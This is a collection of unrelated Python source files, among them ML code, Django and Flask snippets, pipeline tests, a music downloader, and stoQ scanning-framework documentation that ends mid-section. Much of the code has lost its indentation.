import numpy as np
from scipy.ndimage import imread as imread0
import tifffile as tiff
def imread_check_tiff(path):
img = imread0(path)
if img.dtype == 'object':
img = tiff.imread(path)
return img
def imread(path):
if isinstance(path, tuple) or isinstance(path, list):
st = []
for p in path:
st.append(imread_check_tiff(p))
img = np.dstack(st)
if img.shape[2] == 1:
img = np.squeeze(img, axis=2)  # np.squeeze returns a new array; keep the result
return img
else:
return imread_check_tiff(path)
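# A minimal usage sketch for the helpers above; the .tif paths are placeholder
# filenames, and a real run needs readable image files at those locations.
if __name__ == '__main__':
    single = imread('channel_0.tif')                      # one path -> one array
    stacked = imread(['channel_0.tif', 'channel_1.tif'])  # list of paths -> channels stacked on axis 2
    print(single.shape, stacked.shape)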
|
"""Module containing the user entity"""
from django.db import models
from django.contrib.auth.models import (AbstractBaseUser, BaseUserManager)
from shared.base_model import BaseModel
class User(AbstractBaseUser, BaseModel):
"""Model for a user in the system"""
class Meta:
"""Class to add more information on user model"""
ordering = ('username', )
username = models.CharField(max_length=150, unique=True)
email = models.EmailField(max_length=150, unique=True)
password = models.CharField(max_length=100)
first_name = models.CharField(max_length=100, null=True, blank=True)
last_name = models.CharField(max_length=100, null=True, blank=True)
image_url = models.URLField(
default='https://res.cloudinary.com/health-id/image/upload/'
'v1554552278/Profile_Picture_Placeholder.png'
)
is_admin = models.BooleanField(default=False)
last_login = models.DateTimeField(auto_now=True)
USERNAME_FIELD = "email"
REQUIRED_FIELDS = []
def __str__(self):
return self.email
|
# TODO: feature - download music based on style & date | quantity
# TODO: construct more logical download tree with meta data
# TODO: open user's file explorer after download
# TODO: setup script
# TODO: add license and responsibilities
import os
import re
import datetime
import requests
import shutil
from bs4 import BeautifulSoup
def main():
print_header()
releases = get_user_selection_and_links()
print(releases)
download_selection(releases)
def print_header():
print('----------------------------------------')
print('--------RUPSY DOWNLOAD PROGRAM----------')
print('----------------------------------------')
def get_user_selection_and_links():
# download music based on artist selection
# TODO: add validation on input
artist_selection = input('What artist would you like releases from?\n')
# scrape site and get URLs for releases for artist
url = 'http://www.rupsy.ru/index.php'
host = 'www.rupsy.ru'
html = requests.get(url + '?id=4&search={0}'.format(artist_selection))
soup = BeautifulSoup(html.text, 'html.parser')
releases = soup.find_all('td', class_='rel')
release_list = []
for release in releases:
release_list.append((release.find('div', class_='rel_name').find('a').text,
host + release.find('div', style='text-align:center;').find('a')['href']))
return release_list
def download_selection(releases):
download_path = os.path.join(os.path.abspath(os.path.curdir), 'rupsy-downloads')
# check for folder and create rupsy-download folder if necessary
if not (os.path.isdir(download_path)):
os.makedirs(download_path)
# download releases
for release in releases:
# get download filename
rh = requests.head('http://' + release[1])
release_download_filename = release[0].replace(' ', '') + '.{0}'\
.format(rh.headers['Location'].split('.')[-1]).lower()
# create file if one doesn't exist
if not (os.path.isfile(os.path.join(download_path, release_download_filename))):
dir_fd = os.open(download_path, os.O_RDONLY)
def opener(path, flags):
return os.open(path, flags, dir_fd=dir_fd)
r = requests.get('http://' + release[1], stream=True)
print('Starting release download')
with open(release_download_filename, 'wb', opener=opener) as fd:
c = 0
for chunk in r.iter_content(1024):
fd.write(chunk)
c += len(chunk)
# report progress roughly once per megabyte, based on bytes actually written
if c % 1048576 < 1024:
print('Downloaded {0}MB of {1}...'.format(c // 1048576, release[0]))
os.close(dir_fd) # don't leak a file descriptor
print('Finished downloading {0} to {1}'.format(release[0], download_path))
# unpacking zip if zip
if os.path.splitext(os.path.join(download_path, release_download_filename))[1] in ['.zip', '.tar']:
print('Unpacking compressed file for {0}'.format(release[0]))
shutil.unpack_archive(os.path.join(download_path, release_download_filename), extract_dir=download_path)
print('Successfully unpacked file. Deleting compressed source...')
os.remove(os.path.join(download_path, release_download_filename))
print('Done!')
else:
print('You already have downloaded {0}'.format(release[0]))
if __name__ == '__main__':
main()
|
import numpy as np
from ml_algorithms import utils
class DecisionTreeRegressorNode:
def __init__(self, score, num_samples, prediction):
self.score = score
self.num_samples = num_samples
self.prediction = prediction
self.feature_idx = 0
self.threshold = 0
self.left = None
self.right = None
class DecisionTreeRegressor:
def __init__(self, criterion='mse', max_depth=None):
self.criterion = criterion.lower()
self.depth = 0
self.n_features = 0
self.n_classes = 0
self.n_leaves = 0
self.tree = None
self.max_depth = max_depth
if self.criterion == 'mse':
self.prediction_fn = lambda x: np.mean(x)
self.score_fn = utils.mse_score
elif self.criterion == 'mae':
self.prediction_fn = lambda x: np.median(x)
self.score_fn = utils.mae_score
elif self.criterion == 'poisson':
self.prediction_fn = lambda x: np.mean(x)
self.score_fn = utils.poisson_score
else:
raise ValueError(f'invalid criterion: {criterion}')
def fit(self, X, y):
X = np.array(X)
y = np.array(y)
n, k = X.shape
self.n_classes = len(np.unique(y))
self.n_features = k
self.tree = self._build_tree(X, y)
return self.evaluate(X, y)
def _build_tree(self, X, y, depth=0):
n = len(y)
if n == 0:
return None
# the prediction is the mean/median of the data
prediction = self.prediction_fn(y)
# score = error(ground truth, prediction)
score = self.score_fn(y, prediction)
node = DecisionTreeRegressorNode(score=score, num_samples=n, prediction=prediction)
# keep splitting recursively until max depth
if not self.max_depth or depth < self.max_depth:
self.depth = max(depth, self.depth)
# find optimal split for node
feature_idx, threshold = self._split(X, y)
if feature_idx is not None:
# calculate left and right indices
idx_left = X[:, feature_idx] < threshold
idx_right = ~idx_left
# split to left and right nodes
X_left, y_left = X[idx_left], y[idx_left]
X_right, y_right = X[idx_right], y[idx_right]
# update node values
node.feature_idx = feature_idx
node.threshold = threshold
node.left = self._build_tree(X_left, y_left, depth + 1)
node.right = self._build_tree(X_right, y_right, depth + 1)
else:
# leaf node
self.n_leaves += 1
else:
# leaf node
self.n_leaves += 1
return node
def _split(self, X, y):
n = len(y)
if n <= 1:
return None, None
# the prediction is the mean/median of the data
prediction = self.prediction_fn(y)
# score = error(ground truth, prediction)
best_score = self.score_fn(y, prediction)
best_feature_idx, best_threshold = None, None
# loop through all features
for feature_idx in range(self.n_features):
# get current feature vector of all entries
feature = X[:, feature_idx]
# sorted feature vector is the thresholds
thresholds = np.sort(feature)
# loop through all possible split thresholds
for threshold in thresholds:
indices = feature < threshold
y_left = y[indices]
y_right = y[~indices]
# skip degenerate thresholds that would leave one side empty
if len(y_left) == 0 or len(y_right) == 0: continue
prediction_left = self.prediction_fn(y_left)
prediction_right = self.prediction_fn(y_right)
# calculate score sum of left and right node scores
score_left = self.score_fn(y_left, prediction_left)
score_right = self.score_fn(y_right, prediction_right)
score = score_left + score_right
if score < best_score:
best_score = score
best_feature_idx = feature_idx
best_threshold = threshold
return best_feature_idx, best_threshold
def predict(self, X):
return np.array([self._predict_one(x) for x in X])
def _predict_one(self, x):
return self._predict_node(x).prediction
def _predict_node(self, x):
node = self.tree
while node.left:
if x[node.feature_idx] < node.threshold:
node = node.left
else:
node = node.right
return node
def evaluate(self, X, y):
y = np.array(y)
y_pred = self.predict(X)
# average score across all predictions
score = np.mean([self._predict_node(x).score for x in X])
# r^2 score
r2 = utils.r2_score(y, y_pred)
return score, r2
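# A minimal usage sketch for DecisionTreeRegressor; it assumes ml_algorithms.utils
# provides mse_score and r2_score as the imports above suggest, and it uses a tiny
# made-up dataset purely for illustration.
if __name__ == '__main__':
    X_toy = [[1.0], [2.0], [3.0], [4.0]]
    y_toy = [1.5, 1.6, 3.1, 3.0]
    reg = DecisionTreeRegressor(criterion='mse', max_depth=2)
    train_score, train_r2 = reg.fit(X_toy, y_toy)  # fit() returns evaluate(X, y)
    print('depth:', reg.depth, 'leaves:', reg.n_leaves)
    print('train score:', train_score, 'r2:', train_r2)
    print('predictions:', reg.predict(X_toy))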
|
"""
The MIT License (MIT)
Copyright (c) 2012, Florian Finkernagel <finkernagel@imt.uni-marburg.de>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from pathlib import Path
import pytest
import pypipegraph as ppg
from .shared import write, read
@pytest.mark.usefixtures("new_pipegraph")
class TestPruning:
def test_basic_prune(self):
ppg.FileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B"))
b.prune()
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert not Path("B").exists()
def test_basic_prune2(self):
a = ppg.FileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B"))
b.depends_on(a)
b.prune()
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert not Path("B").exists()
def test_basic_prune3(self):
a = ppg.FileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B"))
c = ppg.FileGeneratingJob("C", lambda: write("C", "C"))
d = ppg.FileGeneratingJob("D", lambda: write("D", "D"))
b.depends_on(a)
b.prune()
c.depends_on(b) # that is ok, pruning happens after the complete build.
d.depends_on(a)
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert Path("D").read_text() == "D"
assert not Path("B").exists()
assert not Path("C").exists()
assert c._pruned == b.job_id
def test_pruning_does_not_prune_final_jobs(self):
ppg.FileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B"))
ppg.FinalJob("shu", lambda: write("C", "C"))
b.prune()
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert Path("C").read_text() == "C"
assert not Path("B").exists()
def test_pruning_final_jobs_directly(self):
ppg.FileGeneratingJob("A", lambda: write("A", "A"))
ppg.FileGeneratingJob("B", lambda: write("B", "B"))
c = ppg.FinalJob("shu", lambda: write("C", "C"))
c.prune()
ppg.run_pipegraph()
assert Path("A").read_text() == "A"
assert Path("B").read_text() == "B"
assert not Path("C").exists()
def test_tempfile_not_run_on_prune(self):
a = ppg.TempFileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B" + read("A")))
b.depends_on(a)
b.prune()
ppg.run_pipegraph()
assert not Path("B").exists()
assert not Path("A").exists()
def test_tempfile_still_run_if_needed_for_other(self):
a = ppg.TempFileGeneratingJob("A", lambda: write("A", "A"))
b = ppg.FileGeneratingJob("B", lambda: write("B", "B" + read("A")))
c = ppg.FileGeneratingJob("C", lambda: write("C", "C" + read("A")))
b.depends_on(a)
c.depends_on(a)
b.prune()
ppg.run_pipegraph()
assert not Path("B").exists()
assert Path("C").exists()
assert Path("C").read_text() == "CA"
assert not Path("A").exists()
|
import pandas as pd
# input and output the data
data = pd.read_csv('test.csv', header=0, index_col=0)
print(data)
print(type(data))
data.to_csv('testout.csv', encoding='utf-8-sig')
|
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url(r'^$', views.users, name='all'),
url(r'^(?P<user_id>\d+)/$', views.user, name='one'),
url(r'^(?P<user_id>\d+)/edit/$', views.edit_view, name='edit'),
)
|
"""
Generation of data because it's tedious to do it by hand
"""
class Generator:
def __init__(self, num_datapoints: int):
self.n = num_datapoints
self.celcius = []
self.farenheight = []
def getData(self):
for i in range(self.n):
num = i * 2 + 1
self.celcius.append(num)
self.farenheight.append(num * 9 / 5 + 32)
return self.celcius, self.farenheight
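# A small usage sketch: Generator produces paired Celsius/Fahrenheit values via
# the standard F = C * 9/5 + 32 conversion implemented in getData().
if __name__ == '__main__':
    celsius, fahrenheit = Generator(num_datapoints=3).getData()
    print(celsius)      # [1, 3, 5]
    print(fahrenheit)   # [33.8, 37.4, 41.0]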
|
#
# Copyright 2021 LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
#
import os
controller = os.environ['HOROVOD_CONTROLLER']
operators = os.environ['HOROVOD_CPU_OPERATIONS']
timeout = os.environ['HOROVOD_GLOO_TIMEOUT_SECONDS']
rendez_port = os.environ['HOROVOD_GLOO_RENDEZVOUS_PORT']
rendez_addr = os.environ['HOROVOD_GLOO_RENDEZVOUS_ADDR']
cross_rank = os.environ['HOROVOD_CROSS_RANK']
cross_size = os.environ['HOROVOD_CROSS_SIZE']
local_rank = os.environ['HOROVOD_LOCAL_RANK']
local_size = os.environ['HOROVOD_LOCAL_SIZE']
size = os.environ['HOROVOD_SIZE']
rank = os.environ['HOROVOD_RANK']
hostname = os.environ['HOROVOD_HOSTNAME']
job_name = os.environ['JOB_NAME']
print('JOB_NAME is ' + job_name)
print('Horovod envs are as follows:')
print('controller: ' + controller)
print('operators: ' + operators)
print('timeout: ' + timeout)
print('rendez_port: ' + rendez_port)
print('rendez_addr: ' + rendez_addr)
print('cross_rank: ' + cross_rank)
print('cross_size: ' + cross_size)
print('local_rank: ' + local_rank)
print('local_size: ' + local_size)
print('size: ' + size)
print('rank: ' + rank)
print('hostname: ' + hostname)
if not (controller and job_name and operators and timeout and rendez_addr and rendez_port and cross_rank and cross_size and local_rank and local_size and size and rank):
raise ValueError('One or more required Horovod environment variables are empty')
|
from flask import Blueprint
from flask_restful import Resource, Api
from App.models import HomeBanner
api = Api()
def init_api(app):
api.init_app(app=app)
class HomeResource(Resource):
def get(self):
homebanners = HomeBanner.query.all()
return {'msg':'ok'}
api.add_resource(HomeResource,'/home/')
|
from pydantic import BaseModel
from datetime import datetime
class BusStop(BaseModel):
id: int
message_text: str
city: str
created: datetime
creator_id: int
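# A minimal usage sketch: the field values below are made-up placeholders, shown
# only to illustrate how pydantic validates and coerces input for this model.
if __name__ == '__main__':
    stop = BusStop(
        id=1,
        message_text='Next bus in 5 minutes',
        city='Berlin',
        created='2021-06-01T12:00:00',  # ISO datetime strings are parsed into datetime
        creator_id=42,
    )
    print(stop)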
|
"""Configuration tests."""
import os
from gt4sd.configuration import (
GT4SDConfiguration,
get_algorithm_subdirectories_in_cache,
get_algorithm_subdirectories_with_s3,
)
gt4sd_configuration_instance = GT4SDConfiguration.get_instance()
def test_default_local_cache_path():
if "GT4SD_LOCAL_CACHE_PATH" not in os.environ:
assert os.path.dirname(
gt4sd_configuration_instance.gt4sd_local_cache_path
) == os.path.expanduser("~")
assert (
os.path.basename(gt4sd_configuration_instance.gt4sd_local_cache_path)
== ".gt4sd"
)
else:
assert (
gt4sd_configuration_instance.gt4sd_local_cache_path
== os.environ["GT4SD_LOCAL_CACHE_PATH"]
)
def test_get_algorithm_subdirectories_with_s3():
assert isinstance(get_algorithm_subdirectories_with_s3(), set)
def test_get_algorithm_subdirectories_in_cache():
assert isinstance(get_algorithm_subdirectories_in_cache(), set)
|
#
# Cole Smith
# Restaurant Closure Engine
# BDS - Undergraduate
# prediction.py
#
# Cluster generation routines for latent restaurant segmentation
#
from sklearn.decomposition import PCA
from src.preprocessing.fetch import fetch_restaurant_inspection_data
from src.preprocessing.transform import min_max_scale_values
# NOT IMPLEMENTED: Not practical since this information
# is grouped by DATE and zip code.
# def pca_on_master_file(n=3):
# """
# Performs a PCA decomposition on the
# master dataset (as defined in merge.py)
#
# :param n: The number of dimensions to keep
# :return: `Numpy Matrix, Labels Array`
# """
# pass
def pca_on_restaurant_inspections_file(n=3, y='is_closed'):
"""
Performs a PCA decomposition on the
restaurant inspections dataset (as defined in
fetch.py)
:param n: The number of dimensions to keep
:param y: The name of the prediction col (to color)
:return: `Numpy Matrix, Labels Array`
"""
print("[ INF ] Beginning Restaurant Violation PCA")
print("[ INF ] Fetching...")
df = fetch_restaurant_inspection_data().dropna()
colors = df[y]
df = df.drop(y, axis=1)
# Drop other unneeded columns
drop_list = ['camis', 'dba', 'boro', 'building', 'street', 'zip', 'phone',
'inspection_year', 'inspection_month', 'inspection_day',
'violation_ratio', 'cuisine_description']
df = df.drop(drop_list, axis=1)
# Pivot cuisine
# cuisines = pd.get_dummies(df['cuisine_description'], prefix='cuisine')
# df = df.join(cuisines).drop('cuisine_description', 1)
df = min_max_scale_values(df, None)
# Create PCA representation
print("[ INF ] Beginning PCA Decomposition: N =", n)
pca = PCA(n_components=n).fit_transform(df)
print("[ INF ] Done.")
return pca, colors
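# A brief usage sketch; it assumes the src.preprocessing package and its data
# sources are available, and it simply prints the shapes of the returned values.
if __name__ == '__main__':
    components, labels = pca_on_restaurant_inspections_file(n=2)
    print(components.shape, len(labels))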
|
import numpy as np
import warnings
from digideep.agent.sampler_common import Compose, flatten_memory_to_train_key, get_memory_params, check_nan, check_shape, check_stats, print_line
from digideep.agent.sampler_common import flatten_first_two
from digideep.utility.logging import logger
from digideep.utility.profiling import KeepTime
def get_sample_memory(memory, info):
"""Sampler function for DDPG-like algorithms where we want to sample data from an experience replay buffer.
This function adds the following key to the buffer:
* ``/observations_2``
Returns:
dict: One sampled batch to be used in the DDPG algorithm for one step of training. The shape of each
key in the output batch will be: ``(batch_size, *key_shape[2:])``
"""
# Get information from info
batch_size = info["batch_size"]
observation_path = info["observation_path"]
# Whether to use CER or not:
# use_cer = info.get("use_cer", False)
# Get the main data from the memory
buffer = memory.get_buffer()
# Get some constants from the memory
num_workers = memory.get_num_batches()
# num_records = memory.length * num_workers
N = memory.get_last_trans_index() - 1 # We don't want to consider the last "incomplete" record, hence "-1"
record_arr = memory.get_index_valid_elements()
worker_arr = np.arange(0, num_workers)
num_records = len(record_arr) * num_workers
# with KeepTime("mask_array"):
# masks_arr = buffer["/masks"][:,record_arr]
# masks_arr = masks_arr.reshape(-1)
if batch_size >= num_records:
# We don't have enough data in the memory yet.
logger.debug("batch_size ({}) should be smaller than total number of records (~ {}={}x{}).".format(batch_size, num_records, num_workers, len(record_arr)))
return None
with KeepTime("sampling_by_choice"):
# if use_cer:
# last_chunk_indices = memory.get_index_valid_last_chunk()
# available_batch_size = len(last_chunk_indices) * num_workers
# if available_batch_size <= batch_size:
# # We have selected a few transitions from previous step.
# # Now, we should sample the rest from the replay buffer.
# sample_record_recent = np.repeat(last_chunk_indices, num_workers) # 10 10 10 10 11 11 11 11 ...
# sample_worker_recent = np.tile(worker_arr, len(last_chunk_indices)) # 0 1 2 3 0 1 2 3 ...
#
# batch_size_prime = batch_size - available_batch_size
#
# # Select the rest ...
# sample_record_prime = np.random.choice(record_arr, batch_size_prime, replace=True)
# sample_worker_prime = np.random.choice(worker_arr, batch_size_prime, replace=True)
#
# # Combine
# sample_record = np.concatenate([sample_record_recent, sample_record_prime])
# sample_worker = np.concatenate([sample_worker_recent, sample_worker_prime])
# else:
#
# # OK, we have enough data, so no sampling!
# logger.warn("CER: Latest transitions greater than batch size. Sample from last transitions.")
#
# sample_record = np.random.choice(last_chunk_indices, batch_size, replace=True)
# sample_worker = np.random.choice(worker_arr, batch_size, replace=True)
#
# else:
# NOTE: NEVER ever use sampling WITHOUT replacement: Its time scales up with the array size.
# Sampling with replacement:
sample_record = np.random.choice(record_arr, batch_size, replace=True)
sample_worker = np.random.choice(worker_arr, batch_size, replace=True)
# Move the next step samples
sample_record_2 = memory.get_index_move_n_steps(sample_record, 1)
# Make a table of indices to extract transitions
sample_tabular = [[sample_worker], [sample_record]]
sample_tabular_2 = [[sample_worker], [sample_record_2]]
with KeepTime("tabular_index_extraction"):
# Extracting the indices
batch = {}
for key in buffer:
batch[key] = buffer[key][sample_tabular[0],sample_tabular[1]]
with KeepTime("post_key_generation"):
observation_path = "/observations" + observation_path
# Adding predictive keys
batch[observation_path+"_2"] = buffer[observation_path][sample_tabular_2[0],sample_tabular_2[1]]
with KeepTime("flatten_first_two"):
batch = flatten_first_two(batch)
return batch
#############################
### Composing the sampler ###
#############################
# Sampler with replay buffer
sampler_re = Compose([flatten_memory_to_train_key, # Must be present: It flattens the memory dict to the "train" key.
# get_memory_params, # Must be present: It gets the memory parameters and passes them to the rest of functions through "info".
get_sample_memory, # Sample
# check_shape, # It prints the shapes of the existing keys in the chunk.
# check_nan, # It complains about existing NaNs in the chunk.
# check_stats,
# print_line, # This only prints a line for more beautiful debugging.
])
|
from model.contact import Contact
def test_edit_first_contact(app):
if app.contact.count() == 0:
app.contact.create(Contact(firstname ="firstname"))
old_contacts = app.contact.get_contact_list()
contact = Contact(firstname="TEST")
contact.id = old_contacts[0].id
contact.lastname = old_contacts[0].lastname
app.contact.edit_first_contact(contact)
new_contacts = app.contact.get_contact_list()
assert len(old_contacts) == len(new_contacts)
old_contacts[0] = contact
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
|
import json
import threading
import time
from flask import Flask, request, make_response, jsonify
from flask_restplus import Api, Resource, fields
from pub import take_screenshot, RuntimeException, get_image_exists
app = Flask("get-screenshot")
api = Api(app=app)
namespace = api.namespace("/", description="Screenshot as a Service")
URL = "url"
POST = "POST"
URLS = "urls"
@api.errorhandler(RuntimeException)
def handle_invalid_usage(error):
return {'message': error.message}, 400
@namespace.route("/screenshot")
class Screenshot(Resource):
resource_fields = api.model('Screenshot', {
'url': fields.Url,
})
@api.expect(resource_fields)
def post(self):
if request.method == POST and not request.is_json:
return "not json", 400
rjson = request.json
# check if it's a list or one link
if URL not in rjson.keys():
return jsonify({"message": "invalid request"}), 400
# take screenshot
url = rjson[URL]
ret = take_screenshot(url)
# ret is a link: return
if "url" in ret.keys():
return jsonify({"screenshot": ret["url"]})
# wait for screenshot
for i in range(10):
link = get_image_exists(ret["hash"])
if len(link) > 0:
break
time.sleep(0.01)
return jsonify({"screenshot": link})
@namespace.route("/screenshots")
class Screenshots(Resource):
resource_fields = api.model('Screenshots', {
'urls': fields.Url,
})
@api.expect(resource_fields)
def post(self):
if request.method == POST and not request.is_json:
return "not json", 400
rjson = request.json
# check if it's a list or one link
if URLS not in rjson.keys():
return jsonify({"message": "invalid request"}), 400
# multiple links: split list, report if some error is found, return with a list
if URLS in rjson:
screenshots = []
urls = rjson.get(URLS).split(";")
if len(urls) == 0:
return jsonify({"message": "expected urls separated by ;"}), 400
for url in urls:
screenshots.append({url: take_screenshot(url)})
return jsonify({"screenshots": screenshots})
return jsonify({"message": "invalid request"}), 400
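# A minimal sketch for running the service locally; the host/port are assumptions,
# and clients would POST JSON such as {"url": "http://example.com"} to the
# /screenshot route defined above.
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)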
|
# Copyright 2014-2018 PUNCH Cyber Analytics Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. _stoqoverview:
Overview
========
`stoQ` is an extremely flexible framework. In this section we will go over some of
the most advanced uses and show examples of how it can be used as a framework.
.. _framework:
Framework
=========
stoQ is much more than simply a command to be run. First and foremost, stoQ is a
framework. The command `stoq` is simply a means of interacting with the framework.
For more detailed and robust information on APIs available for stoQ, please check
out the :ref:`plugin documentation <pluginoverview>`.
``Stoq`` is the primary class for interacting with `stoQ` and its plugins.
All arguments, except for plugins to be used, must be defined upon instantiation.
Plugins can be loaded at any time. However, to ensure consistent behavior, it is
recommended that all required plugins be loaded upon instantiation.
For these examples, it is assumed the below :ref:`plugins have been installed <installplugins>` in
`$CWD/plugins`:
- dirmon
- exif
- filedir
- hash
- yara
.. _individualscan:
Individual Scan
---------------
Individual scans are useful for scanning single payloads at a time. The user is
responsible for ensuring a payload is passed to the ``Stoq`` class.
.. note:: ``Provider`` plugins are ignored when conducting an individual scan.
1. First, import the required class:
>>> import asyncio
>>> from stoq import Stoq, RequestMeta
2. We will now define the plugins we want to use. In this case, we will be
loading the ``hash``, and ``exif`` plugins:
>>> workers = ['hash', 'exif']
3. Now that we have our environment defined, let's instantiate the ``Stoq`` class:
>>> s = Stoq(always_dispatch=workers)
4. We can now load a payload, and scan it individually with `stoQ`:
>>> src = '/tmp/bad.exe'
>>> loop = asyncio.get_event_loop()
>>> with open(src, 'rb') as src_payload:
... meta = RequestMeta(extra_data={'filename': src})
... results = loop.run_until_complete(s.scan(
... content=src_payload.read(),
... request_meta=meta))
>>> print(results)
... {
... "time": "...",
... "results": [
... {
... "payload_id": "...",
... "size": 507904,
... "payload_meta": {
... "should_archive": true,
... "extra_data": {
... "filename": "/tmp/bad.exe"
... },
... "dispatch_to": []
... },
... "workers": {
... "hash": {
... [...]
.. _providerscan:
Using Providers
---------------
Using stoQ with providers allows for the scanning of multiple payloads from
multiple sources. This method will instantiate a `Queue` which payloads
are published to for scanning by `stoQ`. Additionally, payloads may be
retrieved from multiple disparate data sources using `Archiver` plugins.
1. First, import the required class:
>>> import asyncio
>>> from stoq import Stoq
2. We will now define the plugins we want to use. In this case, we will be
loading the ``dirmon``, ``filedir``, ``hash``, and ``exif`` plugins. We
will also set the ``base_dir`` to a specific directory. Additionally,
we will set some plugin options to ensure the plugins are
operating the way we'd like them to:
>>> always_dispatch = ['hash']
>>> providers = ['dirmon']
>>> connectors = ['filedir']
>>> dispatchers = ['yara']
>>> plugin_opts = {
... 'dirmon': {'source_dir': '/tmp/datadump'},
... 'filedir': {'results_dir': '/tmp/stoq-results'}
... }
>>> base_dir = '/usr/local/stoq'
>>> plugin_dirs = ['/opt/plugins']
.. note:: Any plugin options available in the plugin's ``.stoq`` configuration
file can be set via the ``plugin_opts`` argument.
3. Now that we have our environment defined, let's instantiate the ``Stoq`` class,
and run:
>>> s = Stoq(
... base_dir=base_dir,
... plugin_dir_list=plugin_dirs,
... dispatchers=dispatchers,
... providers=providers,
... connectors=connectors,
... plugin_opts=plugin_opts,
... always_dispatch=always_dispatch
... )
>>> loop = asyncio.get_event_loop()
>>> loop.run_until_complete(s.run())
A few things are happening here:
#. The ``/tmp/datadump`` directory is being monitored for newly created files
#. Each file is opened, and the payload is loaded into ``Stoq`` asynchronously
#. The payload is scanned with the ``yara`` dispatcher plugin
#. The yara dispatcher plugin returns a list of plugins that the payload should
be scanned with
#. The plugins identified by the ``yara`` dispatcher are loaded, and the payload is
sent to them
#. Each payload will always be sent to the ``hash`` plugin because it was defined
in ``always_dispatch``
#. The results from all plugins are collected, and sent to the ``filedir``
connector plugin
#. The ``filedir`` plugin saves each result to disk in ``/tmp/stoq-results``
.. _manualscan:
Manual Interaction
==================
``Stoq`` may also be interacted with manually, rather than relying on the normal workflow.
In this section, we will touch on how this can be done.
Instantiating stoQ
------------------
Let's start by simply instantiating ``Stoq`` with no options. There are several arguments
available when instantiating ``Stoq``, please refer to the :ref:`plugin documentation <pluginoverview>`
for more information and options available:
>>> from stoq import Stoq
>>> s = Stoq()
Loading plugins
---------------
`stoQ` plugins can be loaded using a simple helper function. The framework will
automatically detect the type of plugin it is based on the ``class`` of the plugin.
There is no need to define the plugin type, `stoQ` will handle that once it is loaded:
>>> plugin = s.load_plugin('yara')
Instantiate Payload Object
--------------------------
In order to scan a payload, a ``Payload`` object must first be instantiated. The
``Payload`` object houses all information related to a payload, to include the
content of the payload and metadata (i.e., size, originating plugin information,
dispatch metadata, among others) pertaining to the payload. Optionally, a ``Payload``
object can be instantiated with a ``PayloadMeta`` object to ensure the originating
metadata (i.e., filename, source path, etc...) is also made available:
>>> import os
>>> import asyncio
>>> from stoq.data_classes import PayloadMeta, Payload
>>> filename = '/tmp/test_file.exe'
>>> with open(filename, 'rb') as src:
... meta = PayloadMeta(
... extra_data={
... 'filename': os.path.basename(filename),
... 'source_dir': os.path.dirname(filename),
... }
... )
... payload = Payload(src.read(), meta)
Scan payload
------------
There are two helper functions available for scanning a payload. If a dispatcher
plugin is not being used, then a worker plugin must be defined by passing the
``add_start_dispatch`` argument. This tells `stoQ` to send the ``Payload`` object
to the specified worker plugins.
From raw bytes
^^^^^^^^^^^^^^
If a `Payload` object has not been created yet, the content of the raw payload can
simply be passed to the `Stoq.scan` function. A ``Payload`` object will automatically
be created:
>>> loop = asyncio.get_event_loop()
>>> start_dispatch = ['yara']
>>> results = loop.run_until_complete(
... s.scan('raw bytes', add_start_dispatch=start_dispatch)
... )
From ``Payload`` object
^^^^^^^^^^^^^^^^^^^^^^^
If a ``Payload`` object has already been instantiated, as detailed above, the
``scan_request`` function may be called. First, a new `Request` object must
be instantiated with the `Payload` object that we previously created:
>>> import asyncio
>>> from stoq import Payload, Request, RequestMeta
>>> start_dispatch = ['yara']
>>> loop = asyncio.get_event_loop()
>>> payload = Payload(b'content to scan')
>>> request = Request(payloads=[payload], request_meta=RequestMeta())
>>> results = loop.run_until_complete(
... s.scan_request(request, add_start_dispatch=start_dispatch)
... )
Save Results
------------
Finally, results may be saved using the desired ``Connector`` plugin. `stoQ` stores
results from the framework as a ``StoqResponse`` object. The results will be saved
to all connector plugins that have been loaded. In this example, we will only load
the ``filedir`` plugin which will save the results to a specified directory:
>>> connector = s.load_plugin('filedir')
>>> loop.run_until_complete(connector.save(results))
Split Results
-------------
In some cases it may be required to split results out individually. For example, when
saving results to different indexes depending on plugin name, such as with ElasticSearch or Splunk.
>>> results = loop.run_until_complete(s.scan(payload))
>>> split_results = results.split()
Reconstructing Subresponse Results
----------------------------------
stoQ can produce complex results depending on the recursion depth and extracted payload objects.
